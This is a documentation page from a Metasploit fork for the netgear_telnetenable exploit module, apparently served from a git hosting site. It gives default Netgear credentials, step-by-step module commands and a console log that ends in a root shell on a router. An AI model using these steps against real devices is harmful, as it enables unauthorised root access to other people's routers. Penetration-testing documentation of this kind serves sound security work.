adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
109bc87ffbdfd5ef16e4d9ca9d0ee04fbb901190
metasploit-gs/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
T
William Vu 0c0f00941b Add note about directly connecting to telnetd
2018-03-02 19:15:20 -06:00

128 lines
3.5 KiB
Markdown
Raw Blame History

## Intro
Several models of Netgear devices have a hidden telnet daemon that can be
enabled for remote LAN users by sending a 'magic packet' to the device.
Upon successful connect, a root shell should be presented to the user.
There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console)
This module has been successfully tested against:
- AC1450 in whatever version I bought it with (TCP)
- AC1450 latest V1.0.0.36_10.0.17 (UDP)
- N300 WNR2000 v3 (TCP)
## Setup
A MAC address is required for exploitation. To determine the MAC address of the device:
1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
2. Get the MAC: ```arp -an [IP]```
## Targets
**0 (Automatic)**
Detect if a device listens on TCP or UDP.
**1 (TCP)**
Older devices usually listen on TCP.
**2 (UDP)**
Newer devices usually listen on UDP.
## Options
**MAC**
Set this to the MAC address of the device. You can use `ping` and `arp`
to find it.
**USERNAME**
If this is an older device, it'll take the value of `super_username` in
`nvram`. `Gearguy` is usually correct.
If this is a newer device, it'll take the web UI username, which is
usually unchanged from `admin`.
**PASSWORD**
If this is an older device, it'll take the value of `super_passwd` in
`nvram`. `Geardog` is usually correct.
If this is a newer device, it'll take the web UI password, which is
usually unchanged from `password`.
**VERBOSE**
This will display the username and password used in the magic packet.
## Exploitation
1. Make sure you have a vulnerable device
2. Start metasploit
3. ```use exploit/linux/telnet/netgear_telnetenable```
4. ```set rhost [IP]```
5. ```set mac [MAC Address]```
6. ```exploit```
7. Enjoy a root shell!
## Usage
```
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1
? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```
If you've already exploited TelnetEnable, the exploit will attempt to
connect to `telnetd` directly. This saves us from sending the magic
packet again.
```
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
```
Reference in New Issue View Git Blame Copy Permalink